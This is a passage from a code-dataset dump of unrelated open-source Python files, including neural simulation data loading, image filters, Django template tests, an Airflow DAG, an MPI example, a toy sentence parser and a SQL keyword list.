'x'\n\t\tsave_obj(**kws)\n\t\t# norm\n\t\tkws['obj'] = np.sum(sp_lin.norm(\n\t\t\tx[ids], axis=1), axis=(1, 2))\n\t\tkws['file_name'] = 'norm'\n\t\tsave_obj(**kws)\n\treturn\n\n\ndef load_ephys(\n\t\tgroup: h5py.Group,\n\t\tkws_hf: dict = None,\n\t\trescale: float = 2.0,\n\t\tdtype: str = 'float32', ):\n\tkws_hf = kws_hf if kws_hf else {\n\t\t'dim': 17, 'apply_mask': True}\n\tkws_hf['fov'] = group.attrs.get(\n\t\t'designsize', 30.0) / 2\n\tdiameter = np.array(group['hf_diameter'])\n\t# inconsistent diameters throughout the expt?\n\tif len(set(group.attrs.get('diameter'))) != 1:\n\t\tif 'hf_diameterR' in group:\n\t\t\tdiameter = np.concatenate([\n\t\t\t\tdiameter,\n\t\t\t\tnp.array(group['hf_diameterR']),\n\t\t\t])\n\t\tdiameter = diameter.mean()\n\t\tdiameter_r = diameter\n\telse:\n\t\tdiameter_r = None\n\n\thf = HyperFlow(\n\t\tparams=np.array(group['hf_params']),\n\t\tcenter=np.array(group['hf_center']),\n\t\tdiameter=diameter,\n\t\t**kws_hf,\n\t)\n\tstim = hf.compute_hyperflow(dtype=dtype)\n\tspks = np.array(group['spks'], dtype=float)\n\tif 'badspks' in group:\n\t\tmask = ~np.array(group['badspks'], dtype=bool)\n\telse:\n\t\tmask = np.ones(len(spks), dtype=bool)\n\tstim_r, spks_r, good_r = setup_repeat_data(\n\t\tgroup=group,\n\t\tkws_hf=kws_hf,\n\t\tdiameter=diameter_r,\n\t)\n\n\tif rescale is not None:\n\t\tstim_scale = np.max(np.abs(stim))\n\t\tstim *= rescale / stim_scale\n\t\tif stim_r is not None:\n\t\t\tstim_r *= rescale / stim_scale\n\n\treturn stim, spks, mask, stim_r, spks_r, good_r\n\n\ndef setup_repeat_data(\n\t\tgroup: h5py.Group,\n\t\tkws_hf: dict,\n\t\tdiameter: float = None, ):\n\tif not group.attrs.get('has_repeats'):\n\t\treturn None, None, None\n\n\tpsth = np.array(group['psth_raw_all'], dtype=float)\n\tbadspks = np.array(group['fix_lost_all'], dtype=bool)\n\ttstart = np.array(group['tind_start_all'], dtype=int)\n\tassert (tstart == tstart[0]).all()\n\ttstart = tstart[0]\n\tnc, _, length = psth.shape\n\tintvl = range(tstart[1], tstart[1] + length)\n\n\t# stim\n\thf = HyperFlow(\n\t\tparams=np.array(group['hf_paramsR']),\n\t\tcenter=np.array(group['hf_centerR']),\n\t\tdiameter=diameter if diameter else\n\t\tnp.array(group['hf_diameterR']),\n\t\t**kws_hf,\n\t)\n\tstim = hf.compute_hyperflow()\n\tstim = stim[range(intvl.stop)]\n\tintvl = np.array(intvl)\n\n\t# spks\n\t_spks = np.array(group['spksR'], dtype=float)\n\tspks = np_nans(psth.shape)\n\tfor i in range(nc):\n\t\tfor trial, t in enumerate(tstart):\n\t\t\ts_ = range(t, t + length)\n\t\t\tspks[i][trial] = _spks[:, i][s_]\n\tspks[badspks] = np.nan\n\n\treturn stim, spks, intvl\n\n\ndef setup_supervised_data(\n\t\tlags: int,\n\t\tgood: np.ndarray,\n\t\tstim: np.ndarray,\n\t\tspks: np.ndarray, ):\n\tassert len(stim) == len(spks), \"must have same nt\"\n\tidxs = good.copy()\n\tidxs = idxs[idxs > lags]\n\tsrc = time_embed(stim, lags, idxs)\n\ttgt = spks[idxs]\n\tassert len(src) == len(tgt), \"must have same length\"\n\treturn src, tgt\n\n\ndef time_embed(x, lags, idxs=None):\n\tassert len(x) > lags\n\tif idxs is None:\n\t\tidxs = range(lags, len(x))\n\tx_emb = []\n\tfor t in idxs:\n\t\tx_emb.append(np.expand_dims(\n\t\t\tx[t - lags: t], axis=0))\n\treturn np.concatenate(x_emb)\n\n\ndef simulation_combos():\n\tcombos = [('fixate', i) for i in [0, 1]]\n\tcombos += [('transl', i) for i in [0, 1]]\n\tcombos += [('obj', i) for i in [1]]\n\treturn combos\n\n\ndef _setup_args() -> argparse.Namespace:\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument(\n\t\t\"n_tot\",\n\t\thelp='# frames 
total',\n\t\ttype=int,\n\t)\n\tparser.add_argument(\n\t\t\"--n_batch\",\n\t\thelp='# frames per batch',\n\t\tdefault=int(5e4),\n\t\ttype=int,\n\t)\n\tparser.add_argument(\n\t\t\"--dim\",\n\t\thelp='dimensionality',\n\t\tdefault=33,\n\t\ttype=int,\n\t)\n\tparser.add_argument(\n\t\t\"--min_obj_size\",\n\t\thelp='minimum acceptable object size',\n\t\tdefault=10.5,\n\t\ttype=float,\n\t)\n\tparser.add_argument(\n\t\t\"--dtype\",\n\t\thelp='dtype for alpha_dot',\n\t\tdefault='float32',\n\t\ttype=str,\n\t)\n\treturn parser.parse_args()\n\n\ndef _main():\n\targs = _setup_args()\n\tprint(args)\n\n\tkws = dict(\n\t\tn=args.n_batch,\n\t\tdim=args.dim,\n\t\tfov=45.0,\n\t\tobj_r=0.25,\n\t\tobj_bound=1.0,\n\t\tobj_zlim=(0.5, 1.0),\n\t\tvlim_obj=(0.01, 1.0),\n\t\tvlim_slf=(0.01, 1.0),\n\t\tresidual=False,\n\t\tz_bg=1.0,\n\t\tseed=0,\n\t)\n\taccept_n = {\n\t\t0: None,\n\t\t1: None,\n\t\t2: 1,\n\t\t4: 3,\n\t\t8: 5,\n\t}\n\tsave_dir = '/home/hadi/Documents/MTVAE/data'\n\tcombos = simulation_combos()\n\tprint(f\"Simulation combos:\\n{combos}\")\n\tpbar = tqdm(combos)\n\tfor category, n_obj in pbar:\n\t\tpbar.set_description(f\"creating {category}{n_obj}\")\n\t\talpha_dot, g, g_aux, attrs = generate_simulation(\n\t\t\ttotal=args.n_tot,\n\t\t\tcategory=category,\n\t\t\tn_obj=n_obj,\n\t\t\tkwargs=kws,\n\t\t\taccept_n=accept_n,\n\t\t\tmin_obj_size=args.min_obj_size,\n\t\t\tdtype=args.dtype,\n\t\t)\n\t\tsave_simulation(\n\t\t\tsave_dir=save_dir,\n\t\t\tx=alpha_dot,\n\t\t\tg=g,\n\t\t\tg_aux=g_aux,\n\t\t\tattrs=attrs,\n\t\t)\n\tprint(f\"\\n[PROGRESS] saving datasets done ({now(True)}).\\n\")\n\treturn\n\n\nif __name__ == \"__main__\":\n\t_main()\n","repo_name":"hadivafaii/_MTMST","sub_path":"base/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":8629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19962157329","text":"from plot_deconvolution import Lucy_Restoration\nfrom PIL import Image, ImageFilter, ImageOps\nfrom PIL.ImageFilter import (\n BLUR, CONTOUR, EDGE_ENHANCE, EDGE_ENHANCE_MORE,\n EMBOSS, FIND_EDGES, SHARPEN\n)\n\nimport numpy as np\n\ndef sharpenPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(SHARPEN)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef blurPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(BLUR)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef rotateCounter(curImg, counter):\n newImg = Image.open(curImg)\n newImg.rotate(90).save('image' + str(counter) + '.jpg')\n\n\ndef rotateClock(curImg, counter):\n newImg = Image.open(curImg)\n newImg.rotate(270).save('image' + str(counter) + '.jpg')\n\n\ndef cropPic(curImg, counter):\n current = Image.open(curImg)\n width, height = current.size\n left = width / 4\n top = height / 4\n right = 3 * width / 4\n bottom = 3 * height / 4\n newImg = current.crop((left, top, right, bottom))\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef sketchPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(CONTOUR)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef oilPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(EDGE_ENHANCE)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef pencilPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(EDGE_ENHANCE_MORE)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef foilPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(EMBOSS)\n 
newImg.save('image' + str(counter) + '.jpg')\n\n\ndef negativePic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(FIND_EDGES)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef histogramEqualize(curImg, counter):\n current = Image.open(curImg)\n newImg = ImageOps.equalize(current, mask=None)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef LucyRestoration(curImg):\n current = Image.open(curImg)\n Lucy_Restoration(current)\n\ndef histogramEqualize_2(curImg, counter):\n current = Image.open(curImg)\n img_gray = current.convert(mode='L') # convert to grayscale\n img_array = np.asarray(img_gray) #convert to NumPy array\n\n histogram_array = np.bincount(img_array.flatten(), minlength=256) #flatten image array and calculate histogram via binning\n \n num_pixels = np.sum(histogram_array)\n histogram_array = histogram_array/num_pixels\n\n chistogram_array = np.cumsum(histogram_array)\n\n transform_map = np.floor(255 * chistogram_array).astype(np.uint8)\n\n img_list = list(img_array.flatten())\n\n eq_img_list = [transform_map[p] for p in img_list]\n\n eq_img_array = np.reshape(np.asarray(eq_img_list), img_array.shape)\n\n eq_img = Image.fromarray(eq_img_array, mode='L') #convert NumPy array to pillow Image and write to file\n eq_img.save('image' + str(counter) + '.jpg')","repo_name":"chungiee/CPE462_ImageProcessing","sub_path":"editFunctions.py","file_name":"editFunctions.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6906645829","text":"import numpy as np\nimport sklearn.datasets as sk_dataset\nimport pandas as pd\nimport sklearn.preprocessing as pre_processing\nimport random\nfrom collections import Counter, defaultdict\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.impute import SimpleImputer\nfrom sklearn import metrics\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndef max2(x):\n xp=x.copy()\n xp[xp == 1] = 0.002\n max=np.max(xp)\n return max\n\nplt.rcParams[\"font.weight\"] = \"bold\"\nplt.rcParams[\"axes.labelweight\"] = \"bold\"\nX = np.loadtxt('../数据集/[013]segment(0-1).txt')\nXp = pd.DataFrame(X[:,:-1])\n\nXp.rename(columns = {0: 'A1', 1: '', 2: 'A3', 3: '', 4: 'A5', 5: '', 6: 'A7', 7: '', 8: 'A9', 9: '',10: 'A11', 11: '', 12: 'A13', 13: '', 14: 'A15', 15: '', 16: 'A17', 17: '', 18: 'A19'},\n inplace = True)\n\n\nXp_corr=abs(Xp.corr())\nXp=np.array(Xp)\nmax=max2(Xp)\nprint(max)\nmin=np.min(Xp)\nprint(min)\n\n\nprint(Xp)\nsns.heatmap(Xp_corr, annot = False, vmin = min, vmax = max, cmap = \"hot_r\",\n annot_kws = {'size': 8, 'weight': 'bold'})\nplt.show()\n\n\nXp1=pd.DataFrame(X[:,[5,6,7,8]])\n\nXp1.rename(columns = {0: 'A6', 1: 'A7', 2: 'A8', 3: 'A9'},\n inplace = True)\n\n\nXp1=abs(Xp1.corr())\nXp2=pd.DataFrame(X[:,[9,10,11,12,14,16]])\n\nXp2.rename(columns = {0: 'A10', 1: 'A11',2: 'A12', 3: 'A13', 4: 'A15',5:'A17'},\n inplace = True)\n\n\nXp2=abs(Xp2.corr())\nsns.heatmap(Xp1, annot = True, vmin = min, vmax = max, cmap = \"hot_r\",\n annot_kws = {'size': 8, 'weight': 'bold'})\nplt.show()\n\nsns.heatmap(Xp2,annot = True, vmin = min, vmax = max, cmap = \"hot_r\",\n annot_kws = {'size': 8, 'weight': 'bold'})\nplt.show()\n\n\n\nXp3=pd.DataFrame(X[:,[9,10,11,12,14,16,8]])\n\n\nXp3.rename(columns = {0: 'A10', 1: 'A11',2: 'A12', 3: 'A13', 4: 'A15',5:'A17',6:'A9'},\n inplace = True)\n\n\nXp3=abs(Xp3.corr())\nsns.heatmap(Xp3, annot = True, vmin = min, vmax = max, cmap = \"hot_r\",\n annot_kws = {'size': 8, 'weight': 
'bold'})\nplt.show()\n\n\n\n\n\n\n\n","repo_name":"ouguiliang110/NaiveBayesNetCheck","sub_path":"属性分组的RVFL集成方法/相关性对比算法.py","file_name":"相关性对比算法.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13514991284","text":"import os\nfrom unittest.mock import patch\n\nfrom django.http import HttpRequest\nfrom django.template import engines\nfrom django.test import SimpleTestCase, TestCase, override_settings\n\nfrom core.tests.templatetags.test_svg_icon import VALID_SVG\n\n\n@override_settings(\n STATICFILES_DIRS=[\n os.path.join(os.path.dirname(__file__), \"staticfiles\"),\n ]\n)\nclass SvgIconTests(TestCase):\n def setUp(self):\n self.jinja_engine = engines[\"wagtail-env\"]\n\n def test_jinja_tag(self):\n template = self.jinja_engine.from_string('{{ svg_icon(\"test\") }}')\n self.assertEqual(template.render(), VALID_SVG)\n\n @patch(\"core.templatetags.svg_icon.FALLBACK_ICON_NAME\", \"test\")\n def test_jinja_tag_fallback(self):\n template = self.jinja_engine.from_string('{{ svg_icon(\"invalid\") }}')\n self.assertEqual(template.render(), VALID_SVG)\n\n @patch(\"core.templatetags.svg_icon.FALLBACK_ICON_NAME\", \"missing\")\n def test_jinja_tag_fallback_not_found_error(self):\n template = self.jinja_engine.from_string('{{ svg_icon(\"missing\") }}')\n with self.assertRaises(FileNotFoundError):\n template.render()\n\n @patch(\"core.templatetags.svg_icon.FALLBACK_ICON_NAME\", \"invalid\")\n def test_jinja_tag_fallback_invalid_error(self):\n template = self.jinja_engine.from_string('{{ svg_icon(\"invalid\") }}')\n with self.assertRaises(ValueError):\n template.render()\n\n\n@override_settings(FLAGS={\"MY_FLAG\": [(\"boolean\", True)]})\nclass FeatureFlagTests(TestCase):\n def setUp(self):\n self.jinja_engine = engines[\"wagtail-env\"]\n\n def test_flag_enabled_tag(self):\n template = self.jinja_engine.from_string(\n '{{ flag_enabled(\"MY_FLAG\") }}'\n )\n self.assertEqual(template.render({\"request\": None}), \"True\")\n\n def test_flag_disabled_tag(self):\n template = self.jinja_engine.from_string(\n '{{ flag_disabled(\"MY_FLAG\") }}'\n )\n self.assertEqual(template.render({\"request\": None}), \"False\")\n\n\nclass SlugifyUniqueTests(SimpleTestCase):\n def setUp(self):\n self.engine = engines[\"wagtail-env\"]\n self.template = '{{ \"Some text\" | slugify_unique }}'\n\n def render(self, template, context=None):\n return self.engine.from_string(template).render(context=context)\n\n def test_no_context(self):\n self.assertEqual(self.render(self.template), \"some-text\")\n\n def test_no_request_in_context(self):\n self.assertEqual(self.render(self.template, {}), \"some-text\")\n\n def test_render_with_request_in_context(self):\n self.assertEqual(\n self.render(self.template, {\"request\": HttpRequest()}), \"some-text\"\n )\n\n def test_render_uses_request_to_make_multiple_unique_slugs(self):\n request = HttpRequest()\n template = \" and \".join([self.template, self.template])\n self.assertEqual(\n self.render(template, {\"request\": request}),\n \"some-text and some-text-1\",\n )\n\n def test_render_without_request_repeats_slugs(self):\n template = \" and \".join([self.template, self.template])\n self.assertEqual(self.render(template), \"some-text and some-text\")\n\n def test_multiple_renders_multiple_unique_slugs(self):\n request = HttpRequest()\n rendered = [\n self.render(self.template, {\"request\": request}) for _ in range(5)\n ]\n\n self.assertEqual(\n rendered,\n [\n \"some-text\",\n 
\"some-text-1\",\n \"some-text-2\",\n \"some-text-3\",\n \"some-text-4\",\n ],\n )\n\n def test_different_requests_allow_repeats(self):\n for _ in range(5):\n self.assertEqual(\n self.render(self.template, {\"request\": HttpRequest()}),\n \"some-text\",\n )\n\n\nclass LanguageTagTests(SimpleTestCase):\n def setUp(self):\n self.engine = engines[\"wagtail-env\"]\n\n def render(self, template):\n return self.engine.from_string(template).render()\n\n def test_english_translation(self):\n self.assertEqual(\n self.render(\n \"{% language 'en' %}{{ _( 'English' ) }}{% endlanguage %}\"\n ),\n \"English\",\n )\n\n def test_spanish_translation(self):\n self.assertEqual(\n self.render(\n \"{% language 'es' %}{{ _( 'English' ) }}{% endlanguage %}\"\n ),\n \"Inglés\",\n )\n","repo_name":"cfpb/consumerfinance.gov","sub_path":"cfgov/core/tests/test_jinja2tags.py","file_name":"test_jinja2tags.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"37"} +{"seq_id":"71647619948","text":"\nimport json\n\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef preprocess(train_data_path: str, test_data_path: str, json_path: str):\n df_train = pd.read_csv(train_data_path).drop(\"ID\", axis=1)\n df_test = pd.read_csv(test_data_path).drop(\"ID\", axis=1)\n\n # concatenate\n df_test[\"price\"] = \"test\"\n df = pd.concat([df_train, df_test], axis=0)\n\n # add region column\n with open(json_path, \"r\") as f:\n df[\"region\"] = df[\"loc\"].map(json.load(f))\n\n # bedroom to bathroom ratio\n df[\"bed_bath_ratio\"] = df[\"bedroom\"] / df[\"bathroom\"]\n\n # encode title column by ranks based on highest mean prices\n title_ranks = (\n df_train.groupby(\"title\")[\"price\"]\n .mean()\n .sort_values(ascending=False)\n .rank(method=\"dense\")\n .astype(int)\n )\n df[\"title_rank\"] = df[\"title\"].map(title_ranks)\n df.drop(\"title\", axis=1, inplace=True)\n\n # rearrange to ensure 'price' is the last column\n price_col = df.pop(\"price\")\n df.insert(len(df.columns), \"price\", price_col)\n\n # split\n df_train = df[~df[\"price\"].astype(str).str.contains(\"test\")]\n df_test = df[df[\"price\"].astype(str).str.contains(\"test\")]\n\n df_train = df_train.reset_index(drop=True)\n df_test = df_test.reset_index(drop=True)\n\n # label encoding\n le = LabelEncoder()\n\n for col in [\"loc\", \"region\"]:\n le = le.fit(df_train[col])\n df_train[col] = le.transform(df_train[col])\n df_test[col] = le.transform(df_test[col])\n\n # another split\n X = df_train.drop(\"price\", axis=1)\n y = df_train[\"price\"].astype(float)\n X_test = df_test.drop(\"price\", axis=1)\n\n\n # fill null values\n imp_mode = SimpleImputer(missing_values=np.nan, strategy=\"most_frequent\")\n imp_mode.fit(X)\n\n X = pd.DataFrame(imp_mode.transform(X), columns=X.columns)\n X_test = pd.DataFrame(imp_mode.transform(X_test), columns=X.columns)\n\n # scale the dataset with standard scaler\n scaler = StandardScaler()\n train_scaler = scaler.fit(X)\n X = train_scaler.transform(X)\n X_test = train_scaler.transform(X_test)\n \n # make X a dataframe again\n X = pd.DataFrame(X, columns=df_train.columns[0:-1])\n\n return X, y, X_test\n\n\nif __name__ == \"__main__\":\n 
preprocess()\n","repo_name":"veronicaeyo/house_price_prediction","sub_path":"scripts/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"26011028519","text":"# PROJECT EULER PROBLEM 72 - Counting Fractions\n\nfrom findDivisorsII import findDivisors\nfrom findFactorsII import findFactors\nfrom memoise import Memoise\nimport primeCheckII\n\n@Memoise\ndef countFractions(N):\n    s = N-1\n    if not primeCheckII.PrimeCheck(N): \n        D = findDivisors(N,False,False)\n        s -= sum([countFractions(d) for d in D])\n    return(s)\n\n\nmax_N = 1000000\ntotal = 0\nfor N in range(max_N,1,-1):\n    if N%1000 == 0:\n        print(N)\n    total += countFractions(N)\n\nprint(total)\n\n","repo_name":"randolchance/PythonProjects","sub_path":"ProjectEulerSolutions/PE72/PE72-CountingFractions.py","file_name":"PE72-CountingFractions.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"10193153328","text":"#!/usr/bin/env python3\n\nimport sys\n\nx = open(sys.argv[1], 'r').read()\nx = x.split('\\n')\nc = 0\narr = []\nfor i in x:\n    if i != '': c+=1\n    else: arr.append(c); c = 0\n\nprint(sum(arr)/len(arr))\n","repo_name":"psuriset/kvm_io","sub_path":"extract_pattern.py","file_name":"extract_pattern.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
{"seq_id":"74104195948","text":"from airflow import DAG, Dataset\r\nfrom airflow.decorators import task\r\n\r\nfrom datetime import datetime\r\n\r\n# Here is a dataset\r\nmy_file = Dataset('/tmp/my_file.txt')\r\nmy_file_2 = Dataset('/tmp/my_file_2.txt')\r\n\r\n# We create the Producer DAG\r\n# This DAG is in charge of updating the dataset that will trigger the consumer DAG\r\nwith DAG(\r\n    dag_id=\"producer\",\r\n    schedule=\"@daily\",\r\n    start_date=datetime(2023, 1, 5),\r\n):\r\n\r\n    # Here is a task that uses the dataset\r\n    # we indicate which task updates the dataset using the outlets parameter\r\n    @task(outlets=[my_file])\r\n    def update_dataset():\r\n        with open(my_file.uri, \"a+\") as f:\r\n            f.write(\"producer update\")\r\n\r\n    @task(outlets=[my_file_2])\r\n    def update_dataset_2():\r\n        with open(my_file_2.uri, \"a+\") as f:\r\n            f.write(\"producer update\")\r\n    \r\n    update_dataset() >> update_dataset_2()","repo_name":"fmaver/Airflow","sub_path":"dags/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"18489473781","text":"from osoba import Osoba\n\nclass Pracownik(Osoba):\n    def __init__(self,imie,wiek,waga,wzrost,firma,stanowisko,latapracy,wynagrodzenie):\n        super().__init__(imie,wiek,waga,wzrost)\n        self.firma = firma\n        self.stanowisko = stanowisko\n        self.latapracy = latapracy\n        self.wynagrodzenie = wynagrodzenie\n        self.pracownik = True\n\n    def print_pracownik(self):\n        print(f'employee data -> company: {self.firma}, job position: {self.stanowisko}, '\n              f'years of service: {self.latapracy}, salary: {self.wynagrodzenie} zł')\n        \n        \n        \n","repo_name":"albim72/PYTHON_Z12","sub_path":"DZIEN_2/OSOBY_/pracownik.py","file_name":"pracownik.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"21636475198","text":"from mpi import 
MPI\nfrom mpi import constants\n\nmpi = MPI()\nworld = mpi.MPI_COMM_WORLD\n\nrank = world.rank()\nsize = world.size()\n\nhandles = []\n\nfor i in range(100):\n    if rank == 0:\n        # This rank receives every message received by the other \n        # processes. \n        for j in range(size-1):\n            handle = world.irecv(constants.MPI_SOURCE_ANY) \n            handles.append(handle)\n\n        while handles:\n            request_list = world.testsome(handles)\n            if request_list:\n                # Finish the request\n                world.waitall(request_list)\n                handles = [ r for r in handles if r not in request_list]\n\n    else:\n        world.send(0, \"My data\", constants.MPI_TAG_ANY)\n\nmpi.finalize()\n","repo_name":"jamitzky/pupyMPI","sub_path":"pupympi/examples/testsome.py","file_name":"testsome.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"27215484018","text":"\"\"\"login_proj URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import: from my_app import views\n    2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n    1. Add an import: from other_app.views import Home\n    2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.urls import include, path\n    2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n    path('', views.default_books_view, name='books_main'),\n    path('', views.book_by_id, name='books_by_id'),\n    path('get_books', views.get_books, name='get_books'),\n    path('add_book', views.add_book, name='add_book'),\n    path('toggle_favorite', views.toggle_favorite, name='toggle_favorite'),\n]\n","repo_name":"twtseng/Dojo_Assignments","sub_path":"Python/django/django_full_stack/favorite_books_proj/favorite_books_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"1027072477","text":"#_*_coding=utf-8_*_\n\nclass ParserError(Exception):\n\tpass\n\nclass Sentence(object):\n\t\n\tdef __init__(self, subject, verb, object):\n\t\t# remember we take ('noun', 'princess') tuples and convert them\n\t\tself.subject = subject[1]\n\t\tself.verb = verb[1]\n\t\tself.object = object[1]\n\n# peek identifies the type of the next word\ndef peek(word_list): # example: word_list = [('verb', 'open'), ('stop','the'), ('noun', 'door')]\n\tif word_list: #\n\t\tword = word_list[0] # word = ('verb', 'open')\n\t\treturn word[0] # word[0] = 'verb'\n\telse:\n\t\treturn \"error 1\"\n\n# match consumes the next word if it has the expected type\ndef match(word_list, expecting): # match(word_list, 'verb')\n\tif word_list:\n\t\tword = word_list.pop(0) # remove ('verb', 'open') from word_list and assign it to word\n\n\t\tif word[0] == expecting: # word[0] = 'verb'\n\t\t\treturn word # returns ('verb', 'open')\n\t\telse:\n\t\t\treturn \"error 2\"\n\t\t\n\telse:\n\t\treturn \"error 3\"\n\n# skip matches away consecutive words of the given type\ndef skip(word_list, word_type):\n\twhile peek(word_list) == word_type: # peek(word_list) returns 'verb'\n\t\tmatch(word_list, word_type) # match returns ('verb', 'open')\n\n\n# parse_verb extracts the verb tuple\ndef parse_verb(word_list):\n    skip(word_list, 'stop') # skip over the 'stop' words\n    \n    if peek(word_list) == 'verb': # if the next word is a verb, match it\n        return match(word_list, 'verb') # and return its value\n    
else:\n        raise ParserError(\"Expected a verb next.\")\n\n# parse_object extracts the object word (a noun or a direction)\ndef parse_object(word_list):\n\tskip(word_list, 'stop') # filter the stop words out of word_list\n\tnext = peek(word_list) # peek at the first word in word_list\n\t\n\tif next == 'noun': \n\t\treturn match(word_list, 'noun') # match a noun\n\tif next == 'direction':\n\t\treturn match(word_list, 'direction') # match a direction word\n\telse:\n\t\traise ParserError(\"Expected a noun or direction next.\")\n\n# parse_subject builds the three values: subj (supplied by parse_sentence), the verb, and the noun or direction\ndef parse_subject(word_list, subj):\n\tverb = parse_verb(word_list) # the verb\n\tobj = parse_object(word_list) # the noun or direction\n\t\n\treturn Sentence(subj, verb, obj) #\n\n# parse_sentence obtains the three values:\ndef parse_sentence(word_list):\n\tskip(word_list, 'stop') # skip the stop words\n\t\n\tstart = peek(word_list) # get the noun or verb\n\t\n\tif start == 'noun': # if it is a noun\n\t\tsubj = match(word_list, 'noun') # assign the noun's value to subj\n\t\treturn parse_subject(word_list, subj) # call parse_subject to get the three values\n\telif start == 'verb': # if it is a verb\n\t\t# assume the subject is the player then\n\t\treturn parse_subject(word_list, ('noun', 'player'))\n\telse:\n\t\traise ParserError(\"Must start with subject, object, or verb not: %s\" %\nstart)\n","repo_name":"PzoHua/learnpython2","sub_path":"ex49/skeleton/ex49/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"70278593709","text":"def main():\n    cars = ['Honda', 'Toyota', 'Nissan']\n    \n    # for loops are used to iterate over sequences\n    \n    # this loop will run 3 times printing one of the strings from the cars list each time\n    for x in cars:\n        print(x)\n    \n    # this loop will run 5 times printing each letter of the word Honda each time\n    for x in cars[0]:\n        print(x)\n\n    # this loop will run 13 times printing the number one, incrementing x by two then printing\n    # again until reaching 26 which will not be printed\n    for x in range(1, 26, 2):\n        print(x)\n    else:\n        print('That is all of the odd numbers 1 - 25')\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"wyatthoffman4392/recruiters-who-code-python","sub_path":"loops/for-loop.py","file_name":"for-loop.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"8397578421","text":"OPERATORS = (\n    '!<',\n    '!=',\n    '!>',\n    '<',\n    '<=',\n    '<>',\n    '=',\n    '>',\n    '>=',\n    '+',\n    '+=',\n    '-',\n    '-=',\n    '*',\n    '*=',\n    '/',\n    '/=',\n    '%',\n    '%=',\n    '&',\n    '&=',\n    '|',\n    '|=',\n    '^',\n    '^=',\n    '~',\n    '::',\n)\n\nOPERATOR_WORDS = (\n    'all',\n    'and',\n    'any',\n    'between',\n    'except',\n    'exists',\n    'in',\n    'intersect',\n    'like',\n    'not',\n    'or',\n    'some',\n    'union',\n)\n\n_KEYWORDS_SERVER = (\n    'add',\n    'all',\n    'alter',\n    'and',\n    'any',\n    'as',\n    'asc',\n    'authorization',\n    'backup',\n    'begin',\n    'between',\n    'break',\n    'browse',\n    'bulk',\n    'by',\n    'cascade',\n    'case',\n    'catch',\n    'check',\n    'checkpoint',\n    'close',\n    'clustered',\n    'coalesce',\n    'collate',\n    'column',\n    'commit',\n    'compute',\n    'constraint',\n    'contains',\n    'containstable',\n    'continue',\n    'convert',\n    'create',\n    'cross',\n    'current',\n    'current_date',\n    'current_time',\n    'current_timestamp',\n    'current_user',\n    'cursor',\n    'database',\n    'dbcc',\n    'deallocate',\n    'declare',\n    'default',\n    'delete',\n    'deny',\n    'desc',\n    'disk',\n    'distinct',\n    'distributed',\n    'double',\n    'drop',\n    'dump',\n    'else',\n    'end',\n    'errlvl',\n    'escape',\n    'except',\n    'exec',\n    
